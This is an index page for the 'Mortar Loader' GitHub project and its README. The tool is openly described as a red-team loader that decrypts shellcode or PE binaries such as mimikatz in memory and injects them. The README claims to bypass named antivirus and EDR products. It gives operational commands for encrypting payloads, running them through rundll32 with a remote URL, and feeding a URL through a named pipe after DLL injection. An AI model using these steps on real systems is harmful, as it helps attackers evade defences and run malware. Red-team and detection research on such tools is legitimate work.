Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/0xsp-SRD/mortar
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
https://github.com/0xsp-SRD/mortar
bypass-antivirus bypass-edr evasion redteam-tools
Last synced: about 2 months ago
JSON representation
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
- Host: GitHub
- URL: https://github.com/0xsp-SRD/mortar
- Owner: 0xsp-SRD
- License: mit
- Created: 2021-11-25T16:49:47.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2023-12-21T22:00:38.000Z (12 months ago)
- Last Synced: 2024-05-20T21:26:46.589Z (7 months ago)
- Topics: bypass-antivirus, bypass-edr, evasion, redteam-tools
- Language: Pascal
- Homepage:
- Size: 2.75 MB
- Stars: 1,354
- Watchers: 28
- Forks: 221
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - 0xsp-SRD/mortar - evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR) (Pascal)
README
[](https://twitter.com/zux0x3a)
# Mortar Loader
Red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption PE/Shellcode inside the memory streams and execute it leveraging several injection techniques .
Mortar is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:* Kaspersky :heavy_check_mark:
* ESET AV / EDR :heavy_check_mark:
* Malewarebytes :heavy_check_mark:
* Mcafee :heavy_check_mark:
* Windows defender :heavy_check_mark:
* Cylance :heavy_check_mark:
* TrendMicro :heavy_check_mark:
* Bitdefender :heavy_check_mark:
* Norton Symantec :heavy_check_mark:
* Sophos EDR :heavy_check_mark:## Updated features
The newer version release (v3) has been released with the following features :
* Fileless execution with remote staged encrypted binary or shellcode.
* Early Bird APC injection.
* Process masquerading.
* Supports Named Pipes.
* Strings and function calls obfuscation.
* Mortar covert reload subroutine.
* Delay execution techniques.For more technical description, refer to the following blogpost : https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
## Usage
### Encryptor
The encryptor encrypt C ShellCode and PE binaries and write the output into .enc file.
you are allowed to use any payload(MSF/cobalt/Havoc..etc) as you prefer as long it is x64 arch and not RAW.```
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
```### Mortar Loader Library
The newer release leverage several techniques combined with remote payload fetching, recommend to refer to following blogpost to get more insights.
for quick instructions
```
# PE Forking1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
```currently supports early bird injection in combination with Named Pipes to receive variables for final execution.
```
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. payload will be executed once valid value has been recieved.
```## Compiling
the project has been coded using FPC(Free Pascal), the compiling procedures are straightforward by downloading and installing Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).
for the encryptor you you can download it from the release section or compile it easily with lazarus ide.
```
#Debian & Ubuntuapt install fpc
apt install lazarus-ide```
## Publications
* The v1 release : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
* Mortar Loader v2 features : https://0xsp.com/offensive/mortar-loader-v2/
* CrestCon Asia 2021 talk : https://www.youtube.com/watch?v=H7EMBz7GLMk## Sponsor ?
the development of mortar or any shared project is an outcome from my personal time.
- you show continues appreciation of my work.
- you will get early access to pre-release.
- ask questions / will be answered.